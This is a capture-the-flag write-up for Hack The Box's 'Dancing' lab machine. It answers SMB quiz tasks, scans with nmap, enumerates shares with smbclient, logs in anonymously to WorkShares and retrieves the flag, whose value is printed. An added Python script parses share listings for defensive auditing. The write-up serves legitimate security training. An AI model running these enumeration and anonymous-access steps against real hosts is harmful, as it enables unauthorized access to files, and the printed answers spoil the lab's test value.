https://app.hackthebox.com/starting-point
Dancing
Task 1:
What does the 3-letter acronym SMB stand for?
Answer 1:
Server Message Block
Task 2:
What port does SMB use to operate at?
Answer 2:
445
Task 3:
What is the service name for port 445 that came up in our Nmap scan?
So let's start nmap and scan the machine:
└─$ nmap 10.129.79.156 -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-02 18:34 CET
Nmap scan report for 10.129.79.156
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds
Answer 3:
microsoft-ds
Task 4:
What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
We find the answer in the help output of smbclient:
└─$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
-M, --message=HOST Send message
-I, --ip-address=IP Use this IP to connect to
-E, --stderr Write messages to stderr instead of stdout
-L, --list=HOST Get a list of shares available on a host
--snip--
Answer 4:
-L
Task 5:
How many shares are there on Dancing?
We use smbclient to list the shares. At the password prompt we simply press Enter:
└─$ smbclient -L 10.129.79.156
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.79.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Answer 5:
4
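Counting the shares by hand works for one box, but the same listing is worth parsing when you audit your own hosts for shares that are visible without credentials. The following is an added example, not part of the original write-up: it parses `smbclient -L` output (the sample below is constructed from the listing above, including the trailing SMB1 diagnostics), counts the shares and flags any that are not the default Windows administrative shares.

```python
import re
from typing import Dict, List

# Constructed sample reproducing the smbclient -L listing for the Dancing box,
# including the diagnostic lines smbclient prints after the table.
SAMPLE_OUTPUT = """\
Password for [WORKGROUP\\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.79.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
"""

# Administrative shares Windows creates by default; anything else deserves a closer look.
DEFAULT_ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}

# One table row: share name, share type, optional comment (WorkShares has none).
SHARE_LINE = re.compile(
    r"^\s*(?P<name>\S+)\s+(?P<type>Disk|IPC|Printer)(?:\s+(?P<comment>.*?))?\s*$"
)


def parse_share_listing(text: str) -> List[Dict[str, str]]:
    """Return one dict per share, skipping the header, the separator and trailing diagnostics."""
    shares: List[Dict[str, str]] = []
    in_table = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Sharename"):
            in_table = True
            continue
        if not in_table or stripped.startswith("---"):
            continue
        match = SHARE_LINE.match(line)
        if not match:
            break  # first non-row line ends the table; smbclient's error messages follow it
        shares.append({"name": match["name"], "type": match["type"], "comment": match["comment"] or ""})
    return shares


def non_default_shares(shares: List[Dict[str, str]]) -> List[str]:
    """Names of shares that are not the built-in administrative shares."""
    return [s["name"] for s in shares if s["name"] not in DEFAULT_ADMIN_SHARES]


if __name__ == "__main__":
    found = parse_share_listing(SAMPLE_OUTPUT)
    print(f"{len(found)} shares, non-default: {non_default_shares(found)}")  # 4 shares, non-default: ['WorkShares']
```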
Task 6:
What is the name of the share we are able to access in the end with a blank password?
We may have to try a few of them, and we get access to "WorkShares":
└─$ smbclient //10.129.79.156/WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \>
Answer 6:
WorkShares
Task 7:
What is the command we can use within the SMB shell to download the files we find?
Answer 7:
get
Task 8:
Submit root flag
We look around the directories a bit and find the flag:
smb: \> ls
. D 0 Mon Mar 29 10:22:01 2021
.. D 0 Mon Mar 29 10:22:01 2021
Amy.J D 0 Mon Mar 29 11:08:24 2021
James.P D 0 Thu Jun 3 10:38:03 2021
5114111 blocks of size 4096. 1748683 blocks available
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 10:38:03 2021
.. D 0 Thu Jun 3 10:38:03 2021
flag.txt A 32 Mon Mar 29 11:26:57 2021
5114111 blocks of size 4096. 1748683 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\>
Answer 8:
5f61c10dffbc77a704d76016a22f1664